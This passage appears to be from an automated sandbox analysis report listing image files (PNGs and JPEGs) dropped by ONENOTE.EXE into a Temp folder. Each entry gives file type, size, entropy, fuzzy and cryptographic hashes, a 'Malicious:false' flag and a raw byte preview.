                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B5AB729E-E611-482C-8C6A-118C8CD3BA4B}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):99293
                                                                                                                                                                                                                  Entropy (8bit):7.9690121496708555
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
                                                                                                                                                                                                                  MD5:EA45266A770EEA27A24A5BB3BE688B14
                                                                                                                                                                                                                  SHA1:9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
                                                                                                                                                                                                                  SHA-256:EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
                                                                                                                                                                                                                  SHA-512:D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...-...c............sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R..*.<........6...m@..r..j2..HK"|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n...*......#..W.41...5.#.`..I...<.?.|..*+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3*..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B66A547E-B0A1-4B49-B0B3-02849E607001}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B6F1D1C2-767D-4113-A0F3-AD5791B806F5}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):129887
                                                                                                                                                                                                                  Entropy (8bit):7.8877849553452695
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
                                                                                                                                                                                                                  MD5:737E96E41D79D3BDACE7AB4F8CBF6274
                                                                                                                                                                                                                  SHA1:E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
                                                                                                                                                                                                                  SHA-256:7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
                                                                                                                                                                                                                  SHA-512:D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....iExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:..*....a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B7181CB7-AC96-449D-AAE0-4DC13820040C}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B7EB5ED6-E234-4227-8CA2-E9851576F5DE}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55804
                                                                                                                                                                                                                  Entropy (8bit):7.433623355028275
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                                                                                                  MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                                                                                                  SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                                                                                                  SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                                                                                                                                  SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B804FE41-540F-4746-A4E8-F4B64F14912C}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 30 x 700, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1547
                                                                                                                                                                                                                  Entropy (8bit):6.4194805172468286
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
                                                                                                                                                                                                                  MD5:0BA36A74DFBF411FAB348404CCEC3348
                                                                                                                                                                                                                  SHA1:4C619790E517416E178161028987DF1CD3B871CC
                                                                                                                                                                                                                  SHA-256:2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
                                                                                                                                                                                                                  SHA-512:90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B9278544-B004-491A-9FF4-B4C930E5C0C4}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{B9D35794-B9AE-41D4-9FF8-A5840EF6B48A}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{BA32DD6E-F7F3-4CB1-9C7F-776175A2900F}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{BA540A55-0F7B-41AE-B15B-53F64D270953}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{BA7451AC-6C64-43D2-9B4C-AA3572AB428F}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{BAA36EFD-42DF-4BBE-A299-8F6F1D593A0A}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
